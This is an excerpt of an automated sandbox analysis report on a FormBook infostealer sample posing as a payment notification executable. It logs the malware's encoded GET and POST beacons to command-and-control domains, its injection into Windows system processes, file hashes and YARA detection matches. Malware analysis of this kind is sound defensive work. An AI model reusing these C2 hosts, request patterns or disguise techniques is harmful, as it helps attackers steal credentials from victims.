ZRVbWFhxfMy1fbrPb2m/R9ZGDB09NzhOyMr/o2Zo3N2OVY9YOBPgylUm0qcgYNb73AduKR9kNvgP7N6s0jlwHTczZpUonfZAgRs2iBExmIDZERJjMVKf0w0TgcZFbFsyAxCbD6wSE7t [TRUNCATED]
Jan 13, 2025 09:29:21.753671885 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:21 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49995	195.110.124.133	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:23.771188974 CET	535	OUT	GET /fo8o/?DZb=zf440xcx6XAL&6d6p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:29:24.436670065 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:24 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49996	217.196.55.202	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:46.267047882 CET	800	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 2f 51 59 6b 65 2b 4f 7a 37 50 64 43 47 4d 46 50 79 44 38 62 77 31 43 35 44 79 7a 46 36 4b 63 38 35 2b 34 6c 6a 58 69 6e 41 61 33 44 75 31 54 4f 67 3d 3d Data Ascii: 6d6p=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju/QYke+Oz7PdCGMFPyD8bw1C5DyzF6Kc85+4ljXinAa3Du1TOg==
Jan 13, 2025 09:29:46.846259117 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 13 Jan 2025 08:29:46 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49997	217.196.55.202	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:48.801695108 CET	820	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 35 39 42 57 46 53 63 58 70 2b 34 36 67 6f 42 6a 44 34 33 2f 64 4f 38 55 58 59 54 66 6a 67 79 6c 69 74 2b 70 47 49 75 48 55 78 52 31 54 72 35 38 3d Data Ascii: 6d6p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhN59BWFScXp+46goBjD43/dO8UXYTfjgylit+pGIuHUxR1Tr58=
Jan 13, 2025 09:29:49.390702009 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 13 Jan 2025 08:29:49 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49998	217.196.55.202	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:51.331083059 CET	1833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 61 6e 4e 6e 6a 48 44 6c 59 50 7a 59 2f 49 65 55 6e 42 69 74 7a 51 37 57 4b 66 49 72 65 57 47 34 31 45 73 63 6a 71 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 72 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 [TRUNCATED] Data Ascii: 6d6p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWanNnjHDlYPzY/IeUnBitzQ7WKfIreWG41EscjqATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fr/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZzjLvOyX6Lp1QW7PSxZVU4ZA0ZpSPGyBxspQZYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9smqUrpMvCSXzUB59W3sVu3jKhWAT2SvDCRlFEmNor+Iz5Mj0meX2kXGxCyClJhMJzMeeIC992mmDpHwDCVa6DwjzurdIG7M1T1aooykbjpzE9w5PHBzk9ijk/DKisoqh3y41CY9YeV6i1RhBhDLTNO4+WbagvuYEFKWjiMSdBfbRme/KuWO+jCBiCLQaYOxvHpDcSEc9z4CUScoVuVRAfBZvMbpYWtd1ZAQts3/xl2HKnv07y0iOaUWnXR132C2f2e2F1H14CipMz0/xLR7tXlIO6opU/ywLFoo5x/oB0Clx0BiXpMBJvG87ElBps7UJH3/HiWJyZos4nnd3kaWv/HI89O+p2RZkWf5vbCTJINkLQuhRSOrexn3bf5T7A6vtkZo7xkkolqONqVWX3iwJj0v5KMFm8KeFk+gl+DjX7RqqUwpFUVhjfN2bMjUI/RnH6Fq6YrbSI2f6LA4+Usw13scdElY6icLDr6r6jaL2wS15NnpN770ATFqCD0h0xsmZHuVfQxc8hxos9LZM [TRUNCATED]
Jan 13, 2025 09:29:51.907546043 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 13 Jan 2025 08:29:51 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49999	217.196.55.202	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:53.866981983 CET	531	OUT	GET /fo8o/?6d6p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&DZb=zf440xcx6XAL HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:29:54.438087940 CET	1236	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 13 Jan 2025 08:29:54 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?6d6p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&DZb=zf440xcx6XAL platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
Jan 13, 2025 09:29:54.438134909 CET	12	IN	Data Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: ody></html>

Target ID:	0
Start time:	03:26:11
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe"
Imagebase:	0x930000
File size:	1'578'496 bytes
MD5 hash:	F6F599BEA1BDF13254EAE957F1128FA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:26:12
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe"
Imagebase:	0x730000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:26:20
Start date:	13/01/2025
Path:	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe"
Imagebase:	0x570000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:26:21
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xb60000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 